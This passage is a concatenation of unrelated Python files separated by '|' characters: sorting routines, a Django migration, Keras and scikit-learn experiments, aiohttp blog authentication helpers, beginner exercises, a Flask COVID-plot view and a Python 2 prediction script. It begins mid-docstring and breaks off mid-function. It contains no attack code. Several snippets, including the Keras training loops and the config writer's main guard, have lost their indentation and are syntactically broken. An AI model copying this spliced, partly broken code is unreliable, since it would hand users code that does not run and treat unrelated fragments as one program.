    NOTE: redefines the quicksort above; this version pairs with the
    random-pivot partition() defined below.
    """
    if l < r:
        pivot = partition(nums, l, r)
        quicksort(nums,l,pivot-1)
        quicksort(nums,pivot+1,r)
    return nums
def partition(nums,l,r):
    """Randomized partition: pick a random pivot, swap it to the left end,
    then partition exactly as in the deterministic version above.

    Returns the pivot's final index.
    """
    index = random.choice(range(l,r+1))
    # Move the random pivot to position l so the standard scheme applies.
    nums[l], nums[index] = nums[index], nums[l]
    pivot = nums[l]
    while l < r:
        while l < r and nums[r] >= pivot:
            r -= 1
        nums[l] = nums[r]
        while l < r and nums[l] <= pivot:
            l+=1
        nums[r]=nums[l]
    nums[l] = pivot
    return l
print(quicksort([5,2,3,25,89,-3,1,7],0,7)) |
from PyQt5.QtWidgets import QPushButton
from pandas_profiling.report.presentation.core.sample import Sample
class QtSample(Sample):
    """Qt renderer for the report's Sample element: shows its name on a button."""

    def render(self):
        caption = self.content["name"]
        return QPushButton(caption)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-11 14:44
from __future__ import unicode_literals
from django.db import migrations, models
# Auto-generated Django migration: creates the House table.
# NOTE(review): twenty numbered inmate columns is a denormalized design — a
# related Inmate model (ForeignKey to House) would usually be preferred, but
# changing a generated migration's fields would break the migration history.
class Migration(migrations.Migration):

    dependencies = [
        ('studentspot', '0004_auto_20180109_2342'),
    ]

    operations = [
        migrations.CreateModel(
            name='House',
            fields=[
                # houseName doubles as the primary key.
                ('houseName', models.CharField(default='house', max_length=50, primary_key=True, serialize=False)),
                ('inmate1', models.CharField(default='empty', max_length=20)),
                ('inmate2', models.CharField(default='empty', max_length=20)),
                ('inmate3', models.CharField(default='empty', max_length=20)),
                ('inmate4', models.CharField(default='empty', max_length=20)),
                ('inmate5', models.CharField(default='empty', max_length=20)),
                ('inmate6', models.CharField(default='empty', max_length=20)),
                ('inmate7', models.CharField(default='empty', max_length=20)),
                ('inmate8', models.CharField(default='empty', max_length=20)),
                ('inmate9', models.CharField(default='empty', max_length=20)),
                ('inmate10', models.CharField(default='empty', max_length=20)),
                ('inmate11', models.CharField(default='empty', max_length=20)),
                ('inmate12', models.CharField(default='empty', max_length=20)),
                ('inmate13', models.CharField(default='empty', max_length=20)),
                ('inmate14', models.CharField(default='empty', max_length=20)),
                ('inmate15', models.CharField(default='empty', max_length=20)),
                ('inmate16', models.CharField(default='empty', max_length=20)),
                ('inmate17', models.CharField(default='empty', max_length=20)),
                ('inmate18', models.CharField(default='empty', max_length=20)),
                ('inmate19', models.CharField(default='empty', max_length=20)),
                ('inmate20', models.CharField(default='empty', max_length=20)),
            ],
        ),
    ]
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[3]:
# Load the survey responses from a local CSV export.
df = pd.read_csv(r"C:\Users\SAI\Downloads\Survey_Resp.csv")
# In[5]:
df.head()  # first 5 rows of the data set
# In[7]:
df.shape  # (rows, columns) of the data set
# In[8]:
a = df.tail(4)  # last 4 rows of the dataset
# In[9]:
a  # display the rows captured above
# In[10]:
df.columns
# In[18]:
pd.unique(df['COUNTRY_CODE'])  # unique values of COUNTRY_CODE as an array
pd.unique(df['COUNTRY_CODE'].tolist())  # same, computed from a Python list
# In[16]:
numOfRows = len(df.index)  # row count = length of the index
print (numOfRows)
# In[22]:
# Respondent IDs for rows whose country code is US.
RespVal = df[df['COUNTRY_CODE'] == 'US']
RespVal['RESP_ID']
# In[ ]:
# In[ ]:
|
import warnings
import numpy as np
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.callbacks import TensorBoard
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
#ignorowanie warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
warnings.simplefilter(action='ignore', category=DeprecationWarning)
#inicjalizacja dataset iris
iris = load_iris()
X = iris['data']
y = iris['target']
names = iris['target_names']
feature_names = iris['feature_names']
#zamiana kodowania z "labelowego" na one hot - wartosc 1 dla pozycji wartosci, w przeciwnym wypadku 0
oh_enc = OneHotEncoder()
Y = oh_enc.fit_transform(y[:, np.newaxis]).toarray()
#normalizacja wartosci - wartosci w dataset maja teraz (na potrzeby NN) wartosc z zakresu 0-1,
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
#podział dataset na zbior do trenowania i na zbior do weryfikacji treningu
X_train, X_test, Y_train, Y_test = train_test_split(X_scaled, Y, test_size=0.5, random_state=2)
n_features = X.shape[1]
n_classes = Y.shape[1]
# Factory for model-building closures (the zero-arg form KerasClassifier needs).
def create_custom_model(input_dim, output_dim, nodes, n=1, name='model'):
    """Return a zero-argument function that builds a compiled dense network.

    Args:
        input_dim: number of input features.
        output_dim: number of output classes.
        nodes: units per hidden layer.
        n: number of hidden layers.
        name: Keras model name.
    """
    def create_model():
        # Sequential container for the NN layers.
        model = Sequential(name=name)
        for i in range(n):
            # Hidden layer with ReLU activation.
            model.add(Dense(nodes, input_dim=input_dim, activation='relu'))
        # Output layer with softmax activation.
        model.add(Dense(output_dim, activation='softmax'))
        # Compile the model with the given parameters.
        model.compile(loss='categorical_crossentropy',
                      optimizer='adam',
                      metrics=['accuracy'])
        return model
    return create_model
#utworzenie modelu z n warstwami
models = [create_custom_model(n_features, n_classes, 8, i, 'model_{}'.format(i))
for i in range(1, 4)]
#info o modelu
for create_model in models:
create_model().summary()
#miejsce na callbacks
cb_dict = {}
#callback - klasa "kontrolująca" proces treningu
cb = TensorBoard()
for create_model in models:
model = create_model()
print('Model No.:', model.name)
history_callback = model.fit(X_train, Y_train,batch_size=5,epochs=50,verbose=0,validation_data=(X_test, Y_test),callbacks=[cb])
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test: POMYLKA:', score[0])
print('Test: DOKLADNOSC:', score[1])
cb_dict[model.name] = [history_callback, model]
#funkcja do tworzenia modelu - wymagana przez KerasClassifier
custom_model_1 = create_custom_model(n_features, n_classes, 8, 3)
#tworzenie modelu NN
kearas_model_1 = KerasClassifier(build_fn=custom_model_1, epochs=100, batch_size=5, verbose=0)
#"wynik" NN uzyskany poprzez cross validation
scores = cross_val_score(kearas_model_1, X_scaled, Y, cv=10)
print("DOKLADNOSC : {:0.2f} (+/- {:0.2f})".format(scores.mean(), scores.std())) |
class Solution:
    def minKBitFlips(self, a: 'List[int]', k: 'int') -> 'int':
        """Minimum number of k-length subarray flips to make every bit 1, or -1.

        Greedy: scan left to right; a 0 at position i can only be fixed by
        flipping the window starting at i.  Mutates ``a`` in place (as the
        original did).

        Fix: the original inner loop's bound ``i < (i + k)`` is always true,
        so it flipped from i to the END of the array instead of exactly k
        bits, giving wrong answers (e.g. [0,0,0,1,0,1,1,0], k=3 -> -1
        instead of 3).
        """
        if k == 1:
            # Single-bit flips: just count the zeros.
            return len(a) - sum(a)
        l = len(a)
        count = 0
        for i in range(l - k + 1):
            if a[i] == 0:
                # Flip exactly the k bits a[i..i+k-1].
                for j in range(i, i + k):
                    a[j] ^= 1
                count += 1
        # Any zero remaining in the tail can no longer be covered by a window.
        for i in range(l - k, l):
            if a[i] == 0:
                return -1
        return count
# Successive test cases; each reassignment overwrites the previous pair,
# so only the last (inp, k) is actually evaluated below.
inp,k = [1,1,0], 2
inp,k = [0,1,0], 1
inp,k = [0,0,0,0],3
inp,k = [0],2
inp,k = [0,0,0,1,0,1,1,0],3
print(Solution().minKBitFlips(inp,k))
|
from config import configs
import re, time, json, logging, hashlib, base64, asyncio
import markdown2
from aiohttp import web
from coroweb import get, post
from apis import APIValueError,APIResourceNotFoundError,APIError,APIPermissionError
from model import User,Comment, Blog, next_id
# COOKIE_NAME = 'awesession'
# Secret used to sign session cookies (from the app configuration).
COOKIE_KEY = configs.session.secret
def text2html(text):
    """Convert plain text to minimal HTML: each non-blank line becomes a <p>
    with the HTML special characters escaped.

    Fix: the original's replacements had been mangled into identity replaces
    (e.g. ``'&' -> '&'``), so no escaping happened at all — an XSS hole for
    user-supplied text.  '&' must be escaped first so entities aren't
    double-escaped.
    """
    lines = map(lambda s: '<p>%s</p>' % s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;'),
                filter(lambda s: s.strip() != '', text.split('\n')))
    return ''.join(lines)
def check_admin(request):
    """Raise APIPermissionError unless the request carries an admin user.

    Fix: the original logic was inverted — it returned silently for missing
    or non-admin users and raised for admins, the opposite of an admin gate.
    """
    if request.__user__ is None or not request.__user__.admin:
        raise APIPermissionError()
def get_page_index(page_str):
    """Parse a page-number string; fall back to 1 on non-numeric or < 1 values."""
    try:
        page = int(page_str)
    except ValueError:
        page = 1
    return page if page >= 1 else 1
def user2cookie(user, max_age):
    """Build a signed session cookie "uid-expires-sha1(uid-passwd-expires-key)"."""
    expires = str(int(time.time() + max_age))
    raw = '%s-%s-%s-%s' % (user.id, user.passwd, expires, COOKIE_KEY)
    digest = hashlib.sha1(raw.encode('utf-8')).hexdigest()
    return '-'.join([user.id, expires, digest])
@asyncio.coroutine
def cookie2user(cookie_str):
    """Validate a session cookie and return the matching User, or None.

    The cookie format is "uid-expires-sha1" as produced by user2cookie; any
    parse/expiry/signature failure returns None rather than raising.

    NOTE(review): @asyncio.coroutine / yield from is the pre-3.5 coroutine
    style (removed in Python 3.11); also, if User.findAll returns an empty
    list rather than None, user_arr[0] would raise IndexError — confirm the
    ORM's contract.
    """
    if not cookie_str:
        return None
    try:
        L = cookie_str.split('-')
        if len(L)!=3:
            return None
        uid,expires,sha1 =L
        # Reject expired cookies before doing any database work.
        if int(expires)<time.time():
            return None
        user_arr = yield from User.findAll('id=?',[uid])
        if user_arr is None:
            return None
        user = user_arr[0]
        # Recompute the signature and compare against the cookie's digest.
        s = '%s-%s-%s-%s' %(user.id,user.passwd,expires,COOKIE_KEY)
        if sha1 != hashlib.sha1(s.encode('utf-8')).hexdigest():
            logging.info('invalid sha1...')
            return None
        # Never leak the password hash to callers.
        user.passwd = '******'
        return user
    except Exception as e:
        logging.exception(e)
        return None
words = 'stars glitter turquoise violet buttercup venus diamonds sparkles horoscope'.split()
import random
random.shuffle(words)
# NOTE(review): this first popped word is discarded — random_word is
# immediately overwritten inside the loop, so only 8 of the 9 words print.
random_word = words.pop()
for i in range(8):
    random.shuffle(words)
    random_word = words.pop()
    print(random_word)
|
def demo1():
    """Bind a local variable and print it — locals are invisible elsewhere."""
    value = 10
    print("demo1的内部变量是 %d" % value)
def demo2():
    """No-op: the commented line would raise NameError (num is demo1's local)."""
    # print("%d" % num)
    pass
# Run both demos: demo1 prints its local; demo2 does nothing.
demo1()
demo2()
|
from data import question_data
from question_model import question
from quiz_brain import QuizBrain
# Build question objects from the raw data dicts.
question_bank = []
for q in question_data:
    ques_text = q["text"]
    ques_answer = q["answer"]
    new_question = question(ques_text, ques_answer)
    question_bank.append(new_question)
# Run the quiz until the bank is exhausted, then report the final score.
quiz = QuizBrain(question_bank)
while quiz.still_has_questions() == True:
    quiz.new_question()
print("You've completed the quiz !!! Congratulations !!!")
print(f"Your final score was {quiz.score}/ {quiz.question_number}")
|
# Joshua Chan
# 1588459
# Birthday Calculator
# Collect the current date.
current_day = int(input('What is the calendar day?'))
current_month = int(input('What is the current month?'))
current_year = int(input('What is the current year?'))
# Collect the user's birthday.
birth_day = int(input('What day is your birthday?'))
birth_month = int(input('What month is your birthday?'))
birth_year = int(input('What year were you born?'))
# Age: subtract one year if this year's birthday has not yet arrived.
# Fix: the original only compared months with > and <, so when the months
# were EQUAL (but the day differed) no age was printed at all.
user_age = current_year - birth_year
if current_month > birth_month:
    print('You are', user_age, 'years old.')
elif current_month < birth_month:
    print('You are', user_age - 1, 'years old.')
elif current_day > birth_day:
    print('You are', user_age, 'years old.')
elif current_day < birth_day:
    print('You are', user_age - 1, 'years old.')
# Check whether today is the user's birthday (this branch also prints the age,
# matching the original's behavior on the birthday itself).
if current_day == birth_day and current_month == birth_month:
    print('Happy Birthday!')
    print('You are', user_age, 'years old.')
|
import collections
import math
from collections import Counter
from scipy import stats
def entropy1():
    """Shannon entropy of a uniform distribution over bytes 0..255 (= 8 bits).

    Prints the entropy and (improvement) also returns it so callers can use
    the value programmatically; the original returned None.
    """
    s = range(0, 256)
    # Probability of each value: occurrences / total length (1/256 each here).
    probabilities = [n_x / len(s) for x, n_x in collections.Counter(s).items()]
    # Per-symbol contributions -p * log2(p).
    e_x = [-p_x * math.log(p_x, 2) for p_x in probabilities]
    # Sum the fractions to obtain the Shannon entropy.
    entropy = sum(e_x)
    print(entropy)
    return entropy
# entropy1()
def entropy2():
    """Base-2 entropy of the distribution over the distinct values in labels.

    Counter keys preserve first-seen order; scipy normalizes them into a
    probability distribution.  Prints the entropy and (improvement) also
    returns it; the original returned None.
    """
    labels = [0.9, 0.09, 0.1]
    x = stats.entropy(list(Counter(labels).keys()), base=2)
    print(x)
    return x
entropy2() |
import unittest
from main import sum
class TestMain(unittest.TestCase):
    """Tests for main.sum."""

    def test__sum(self):
        cases = [(1, 2), (2, 3), (2, 0)]
        expected = [3, 5, 2]
        results = [sum(a, b) for a, b in cases]
        self.assertEqual(results, expected)
|
# Read the purchase inputs: budget, gender ('m'/'f'), age, and sport name.
money = float(input())
gender = input()
age = int(input())
sport = input()
# Monthly price table indexed by gender then sport.
gim = {
    'm' :{'Gym' : 42, 'Boxing' : 41, 'Yoga' : 45, 'Zumba' : 34, 'Dances' : 51, 'Pilates' : 39},
    'f' :{'Gym' : 35, 'Boxing' : 37, 'Yoga' : 42, 'Zumba' : 31, 'Dances' : 53, 'Pilates' : 37}
}
subtotal = gim[gender][sport]
# Customers aged 19 or younger get a 20% discount.
if age <= 19:
    subtotal = subtotal * 0.80
# Absolute difference doubles as the "amount short" in the failure branch.
total = abs(money - subtotal)
if money >= subtotal:
    print(f'You purchased a 1 month pass for {sport}.')
else:
    print(f'You don\'t have enough money! You need ${total:.2f} more.')
import operator
def insertion_sort(list_data):
    """Sort list_data in place in ascending order (items compared as floats)
    and return it.

    Fix: in the original, ``i -= 1`` sat INSIDE the swap branch, so whenever
    an element was already >= its left neighbour the inner ``while`` never
    advanced and the function hung (e.g. on any already-sorted input).
    """
    for i in range(1, len(list_data)):
        j = i
        # Bubble the new element leftwards until its left neighbour is smaller.
        while j > 0 and float(list_data[j]) <= float(list_data[j - 1]):
            list_data[j - 1], list_data[j] = list_data[j], list_data[j - 1]
            j -= 1
    return list_data
|
import os
import sys
import json
userHome = os.path.expanduser('~')
config_name = 'config.json'
# Default configuration written on first run.
config_template = {
    "directories": {
        "bookmarksRootDir": os.path.join(userHome, 'Desktop', 'bookmarksBackups'),
        "chromeJSON": os.path.join("chrome_json"),
        "chromeMD": os.path.join("chrome_md"),
        # NOTE(review): the key says "firefoxJson" but the path points at
        # Chrome's bookmarks file — confirm which browser is intended.
        "firefoxJson": os.path.join(
            userHome, "Library/Application Support/Google/Chrome/Default/Bookmarks"),
        "mobileLinksDir": "mobileLinks",
    },
    "filenames": {
        "chr_md_file_prefix": "chrome.md"
    },
    "markdownFormat": "standard"
}
def write_config_file(new_filename):
    """Serialize config_template to new_filename as pretty-printed JSON."""
    serialized = json.dumps(config_template, indent=4)
    with open(new_filename, 'w') as new_file:
        new_file.write(serialized)
    print('File successfully written:', new_filename)
def file_exists(filePath):
    """Raise OSError if filePath already exists; otherwise return None.

    (Despite the name, this is an overwrite guard, not a boolean check.)
    """
    if not os.path.exists(filePath):
        return
    raise OSError(filePath + ' file exists.')
def main():
    """Create config.json one directory up, refusing to overwrite it."""
    target_path = os.path.join('..', config_name)
    file_exists(target_path)  # raises OSError if the file already exists
    write_config_file(target_path)
if __name__ == "__main__":
main()
|
import unittest
class BaseTest(unittest.TestCase):
    """Placeholder for code shared among all the tests."""
|
# Module-level counter handing out sequential job ids.
job_id = 0


class Job:
    """A job posting with a country, name, pay, unique id and optional worker."""

    def __init__(self, country, name="contruction", money=1):
        global job_id
        self.country = country
        self.name = name
        self.money = money
        # Take the next id from the shared counter and advance it.
        self.id = job_id
        job_id += 1
        self.worker = None  # nobody assigned yet

    def to_json(self):
        """Return the JSON-serializable public view (country/worker omitted)."""
        return dict(id=self.id, name=self.name, money=self.money)
|
import os.path
import neat
import numpy as np
from neat_gym_exp import NEATGymExperiment
import roboschool
import matplotlib.pyplot as plt
from OpenGL import GLU
import gym.envs.registration as reg
from mikobot import MiKoBot
# Register the MiKo robot as a Gym environment so it can be created by id.
reg.register("MiKo-v1", reward_threshold=2500, entry_point=MiKoBot, max_episode_steps=1000,
             tags={"pg_complexity": 8000000})
def int_a(a):
    """Interpret a genome's raw output as a numpy action array."""
    action = np.array(a)
    return action
def fitness(rec):
    """Fitness = mean over runs of each run's total reward.

    rec['reward'] is indexed (run, step); sum per run, then average.
    """
    per_run_totals = rec['reward'].sum(axis=1)
    return per_run_totals.mean()
# Load configuration
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
                     neat.DefaultSpeciesSet, neat.DefaultStagnation,
                     os.path.join(os.path.dirname(__file__), 'config-miko'))
# Construct experiment: evolve controllers for MiKo-v1 in parallel,
# averaging fitness over 2 runs per genome across 7 worker instances.
exp = NEATGymExperiment('MiKo-v1', config,
                        interpret_action=int_a,
                        runs_per_genome=2,
                        extract_fitness=fitness,
                        mode='parallel',
                        instances=7,
                        # render_all=True,
                        # network=neat.nn.GRUNetwork,
                        # starting_gen=0
                        )
exp.exp_info(True)
# Run evolution and keep the best genome.
winner = exp.run()
# Plot the fitness curve over generations.
plt.plot(range(len(exp.f_record)), exp.f_record)
plt.ylabel('Fitness')
plt.xlabel('Generation')
plt.xlim(0, len(exp.f_record))
plt.xticks(range(0, len(exp.f_record), len(exp.f_record) // 10))
plt.show()
# Replay/evaluate the winning genome.
exp.test(winner)
|
#!/usr/bin/env python3
# coding: utf-8
import json
from datetime import datetime
from os import path
from types import SimpleNamespace
from flask import render_template, Blueprint
from flask import request
from process_procedures import process, preprocess
import hashlib
# basedir = '.'
basedir = '/var/www/html/covid/'
countries_file = path.join(basedir, 'data/countries_params.json')
covid_service = Blueprint('covid_service', __name__, template_folder='templates')
base_path = path.join(basedir, 'COVID-19/data')
cases_file = "cases_time.csv"
cases_today_file = "cases_country.csv"
# Country metadata (Russian display names etc.), loaded once at import time.
with open(countries_file, 'r', encoding='utf-8') as f:
    countries_data = json.load(f)
# Country list sorted by Russian name, with World and Russia pinned to the
# top and the two cruise ships moved to the end.
all_countries = [el[0] for el in sorted(countries_data.items(), key=lambda x: x[1]['country_ru'])]
w_pos = all_countries.index('World')
all_countries.insert(0, all_countries.pop(w_pos))
r_pos = all_countries.index('Russia')
all_countries.insert(1, all_countries.pop(r_pos))
d_pos = all_countries.index('Diamond Princess')
all_countries.insert(len(all_countries), all_countries.pop(d_pos))
d_pos = all_countries.index('MS Zaandam')
all_countries.insert(len(all_countries), all_countries.pop(d_pos))
@covid_service.route('/', methods=['GET', 'POST'])
def show_plot():
    """Render the COVID plot page; on POST, build (and cache) the requested plot."""
    # Defaults used for a plain GET request.
    chosen_countries = []
    log = True
    daily = True
    nonabs = False
    deaths = True
    current_day = False
    from_date = "2020-03-01"
    forec_confirmed = []
    forec_deaths = []
    if request.method == 'POST':
        # Read the plot options from the submitted form.
        chosen_countries = request.form.getlist('country')
        log = request.form.get('log')
        daily = request.form.get('daily')
        nonabs = request.form.get('nonabs')
        deaths = request.form.get('deaths')
        current_day = request.form.get('current_day')
        from_date = request.form.get('from_date')
        forec_confirmed_checked = request.form.get('forec-confirmed')
        forec_deaths_checked = request.form.get('forec-deaths')
        # Forecast settings packed as [function, fit period, forecast horizon].
        if forec_confirmed_checked:
            forec_confirmed_func = request.form.get('confirmed_function')
            forec_confirmed.append(forec_confirmed_func)
            forec_confirmed.append(request.form.get('for_period_confirmed'))
            forec_confirmed.append(request.form.get('on_period_confirmed'))
        if forec_deaths_checked:
            forec_deaths_func = request.form.get('deaths_function')
            forec_deaths.append(forec_deaths_func)
            forec_deaths.append(request.form.get('for_period_deaths'))
            forec_deaths.append(request.form.get('on_period_deaths'))
        nonlog = False
        if not log:
            nonlog = True
        # Reject country names not in the known list (user-facing Russian text).
        if set(chosen_countries) - set(all_countries):
            return render_template("covid.html", error="Выберите страны из списка!",
                                   countries=all_countries, countries_data=countries_data)
        args = SimpleNamespace(deaths=deaths, list=False, current_day=current_day,
                               from_date=from_date, nonlog=nonlog,
                               regions=chosen_countries,
                               forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
                               forec_current_day=[], nonabs=nonabs, daily=daily)
        cases, cases_today = preprocess(args, base_path, cases_file, cases_today_file)
        # Creating unique filename for the plot: hash of all args plus the
        # current hour, so results are cached for at most an hour.
        params = '_'.join([str(getattr(args, i)) for i in vars(args)])
        params = params + datetime.now().strftime('%Y-%m-%d-%H')
        m = hashlib.md5()
        name = params.encode('ascii', 'backslashreplace')
        m.update(name)
        fname = m.hexdigest()
        out_image = fname + '.png'
        imagepath = path.join(basedir, 'data', out_image)
        # Only regenerate the plot if it is not already cached on disk.
        if not path.isfile(imagepath):
            _ = process(args, cases, cases_today, countries_data,
                        plot_file_name=imagepath, use_agg=True)
        return render_template("covid.html", image=out_image, countries=all_countries,
                               countries_data=countries_data,
                               chosen_countries=chosen_countries,
                               log=log, deaths=deaths, current_day=current_day,
                               from_date=from_date,
                               forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
                               nonabs=nonabs, daily=daily)
    else:
        # GET: show the form with defaults and no plot image.
        return render_template("covid.html", countries=all_countries,
                               countries_data=countries_data,
                               chosen_countries=chosen_countries, log=log, deaths=deaths,
                               current_day=current_day, from_date=from_date,
                               forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
                               nonabs=nonabs, daily=daily)
|
import cv2
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from PIL import Image
import PIL.ImageOps
import os,ssl,time
# Download MNIST (70k 28x28 digit images) from OpenML at import time.
X,y = fetch_openml('mnist_784',version = 1,return_X_y = True)
xtrain,xtest,ytrain,ytest = train_test_split(X,y,random_state = 9,train_size = 7500,test_size = 2500)
# Scale pixel intensities from 0-255 down to 0-1.
xtrainscale = xtrain/255
xtestscale = xtest/255
# Multinomial logistic regression, fitted once at import.
clf = LogisticRegression(solver='saga',multi_class='multinomial').fit(xtrainscale,ytrain)
def getprediction(image):
    """Predict the digit in an image file using the module-level classifier.

    Args:
        image: path or file-like object accepted by PIL.Image.open.

    Returns:
        The predicted label for the image (first element of clf.predict).
    """
    Image_PIL = Image.open(image)
    # Convert to greyscale and down-sample to MNIST's 28x28 size.
    image_bw = Image_PIL.convert('L')
    # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (use
    # Image.LANCZOS there) — confirm the pinned Pillow version.
    image_bw_resize = image_bw.resize((28,28),Image.ANTIALIAS)
    #image_bw_resize_inverter = PIL.ImageOps.invert(image_bw_resize)
    # Treat the darkest 20% of pixels as background and clip it away.
    pixel_filter = 20
    min_pixel = np.percentile(image_bw_resize,pixel_filter)
    image_bw_resize_inverter_scale = np.clip(image_bw_resize-min_pixel,0,255)
    # NOTE(review): the max is taken from the unclipped image rather than the
    # clipped array — presumably intentional, but verify.
    max_pixel = np.max(image_bw_resize)
    image_bw_resize_inverter_scale = np.asarray(image_bw_resize_inverter_scale)/max_pixel
    # Flatten to the 1x784 feature vector the classifier was trained on.
    test_sample = np.array(image_bw_resize_inverter_scale).reshape(1,784)
    test_prediction = clf.predict(test_sample)
    return test_prediction[0]
import sys
import os
import csv
import cPickle as pickle
import glob
import numpy as np
import pandas as pd
from features import extract_features, extract_features2, get_all_features
def load_model(model_dir, verbose=True):
    """Load and return a pickled model from model_dir.

    The verbose flag is accepted for API compatibility but currently unused.
    """
    with open(model_dir, 'rb') as fi:
        return pickle.load(fi)
def parse_dataframe(df):
    """Parse every cell of df (space-separated number strings) into float arrays.

    Fix: ``np.float`` was removed in NumPy 1.24; the builtin ``float`` is the
    supported, equivalent spelling.
    """
    parse_cell = lambda cell: np.fromstring(cell, dtype=float, sep=" ")
    df = df.applymap(parse_cell)
    return df
def read_data(filename_pairs, filename_info, symmetrize=True):
    """Load the pairs and publicinfo CSVs, join them on SampleID, and
    optionally interleave an A/B-swapped copy of every row.

    NOTE(review): this function relies on Python 2 semantics — ``zip`` as a
    list inside ``np.array`` and ``range(...) + range(...)`` concatenation —
    and on the long-removed ``DataFrame.sort`` API; it will not run
    unchanged on Python 3 / modern pandas.
    """
    # Cells hold space-separated numbers; parse them into float arrays.
    df_pairs = parse_dataframe(pd.read_csv(filename_pairs, index_col="SampleID"))
    df_info = pd.read_csv(filename_info, index_col="SampleID")
    features = pd.concat([df_pairs, df_info], axis=1)
    if symmetrize:
        # Duplicate each row with columns A and B swapped so a direction-
        # sensitive model sees both orderings.
        features_inverse = features.copy()
        features_inverse['A'] = features['B']
        features_inverse['A type'] = features['B type']
        features_inverse['B'] = features['A']
        features_inverse['B type'] = features['A type']
        original_index = np.array(zip(features.index, features.index)).flatten()
        features = pd.concat([features, features_inverse])
        # Interleave: even slots original rows, odd slots swapped copies.
        features.index = range(0,len(features),2)+range(1,len(features),2)
        features.sort(inplace=True)
        features.index = original_index
        features.index.name = "SampleID"
    return features
def symmetrize_features(ori_features, features, feature_def=None):
    """Append features extracted from the A/B-swapped rows, interleaved with
    the originals (same layout as read_data's symmetrize branch).

    NOTE(review): like read_data, this uses Python 2-only constructs
    (list ``zip``, ``range + range``) and the removed ``DataFrame.sort`` API.
    """
    # Build the swapped copy of the raw feature table.
    ori_features_inverse = ori_features.copy()
    ori_features_inverse['A'] = ori_features['B']
    ori_features_inverse['A type'] = ori_features['B type']
    ori_features_inverse['B'] = ori_features['A']
    ori_features_inverse['B type'] = ori_features['A type']
    # Re-extract derived features for the swapped rows.
    features_inverse = extract_features2(ori_features_inverse, features, feature_def)
    original_index = np.array(zip(features.index, features.index)).flatten()
    features = pd.concat([features, features_inverse])
    # Interleave originals (even slots) with swapped copies (odd slots).
    features.index = range(0,len(features),2)+range(1,len(features),2)
    features.sort(inplace=True)
    features.index = original_index
    features.index.name = "SampleID"
    return features
def write_predictions(pred_dir, test, predictions):
    """Write (SampleID, Target) prediction rows to pred_dir as CSV.

    Fix: the output file handle is now closed deterministically via a
    ``with`` block — the original passed ``open(...)`` straight into
    csv.writer and left the handle to the garbage collector.
    """
    with open(pred_dir, "w") as fo:
        writer = csv.writer(fo, lineterminator="\n")
        writer.writerow(("SampleID", "Target"))
        writer.writerows(zip(test.index, predictions))
def main():
    """CLI entry point: featurize the pairs data and write predictions.

    Usage: ``python predict.py input_dir output_dir``. Expects exactly one
    ``*_pairs.csv`` and one ``*_publicinfo.csv`` (sharing a basename) in
    ``input_dir``; writes ``<dataset>_predict.csv`` into ``output_dir``.

    NOTE(review): Python 2 only (``print`` statements).
    """
    if len(sys.argv) < 3:
        print "USAGE: python predict.py input_dir output_dir"
        return -1
    input_dir = sys.argv[1]
    output_dir = sys.argv[2]
    symmetrize = True
    # Get the file names
    filename_pairs = glob.glob(os.path.join(input_dir, '*_pairs.csv'))
    if len(filename_pairs)!=1:
        print('No or multiple pairs.csv files')
        exit(1)
    filename_pairs = filename_pairs[0]
    filename_info = glob.glob(os.path.join(input_dir, '*_publicinfo.csv'))
    if len(filename_info)!=1:
        print('No or multiple publicinfo.scv files')
        exit(1)
    filename_info = filename_info[0]
    # Strip everything after the last '_' to recover the shared basename.
    basename = filename_pairs[:-filename_pairs[::-1].index('_')-1]
    if filename_info[:-filename_info[::-1].index('_')-1] != basename:
        print('Different basenames in publicinfo.csv and pairs.csv files')
        exit(1)
    # Remove the path name
    try:
        dataset = basename[-basename[::-1].index(os.sep):]
    except:
        dataset = basename
    # Raw (non-symmetrized) read; symmetrization happens at feature time.
    test_ori = read_data(filename_pairs, filename_info, False)
    print "Loading the classifier"
    prog_dir = os.path.dirname(os.path.abspath(__file__))
    amodel = load_model(os.path.join(prog_dir, 'models', "model2.pkl"))
    if symmetrize:
        # Per-type specialist models: categorical-categorical, categorical-
        # numerical and numerical-numerical pairs.
        ccmodel = load_model(os.path.join(prog_dir, 'models', "ccmodel.pkl"))
        cnmodel = load_model(os.path.join(prog_dir, 'models', "cnmodel.pkl"))
        nnmodel = load_model(os.path.join(prog_dir, 'models', "nnmodel.pkl"))
    else:
        for m in amodel.systems:
            m.symmetrize = symmetrize
    mymodel = load_model(os.path.join(prog_dir, 'models', "model_t.pkl"))
    # Hard-coded ensemble weights, renormalized to sum to 1.
    mymodel.weights = [0.17275686, 0.1424602, 0.14824986, 0.45374324, 0.08278984]
    mymodel.weights = np.array(mymodel.weights) / sum(mymodel.weights)
    print "Extracting features"
    all_features_clean, used_feature_names = get_all_features()
    test = extract_features(test_ori, all_features_clean)
    test = symmetrize_features(test_ori, test, all_features_clean)
    test = test[['A type', 'B type'] + list(used_feature_names)]
    print "Making predictions"
    aptest = amodel.predict(test)
    myptest = mymodel.predict(test)
    if symmetrize:
        BINARY = 0 #"Binary"
        CATEGORICAL = 1 #"Categorical"
        NUMERICAL = 2 #"Numerical"
        ccfilter = ((test['A type'] != NUMERICAL) & (test['B type'] != NUMERICAL))
        cnfilter = ((test['A type'] != NUMERICAL) & (test['B type'] == NUMERICAL))
        ncfilter = ((test['A type'] == NUMERICAL) & (test['B type'] != NUMERICAL))
        nnfilter = ((test['A type'] == NUMERICAL) & (test['B type'] == NUMERICAL))
        ptest = np.zeros((4,test.shape[0]))
        ccptest = ccmodel.predict(test[ccfilter])
        cnptest = cnmodel.predict(test[cnfilter])
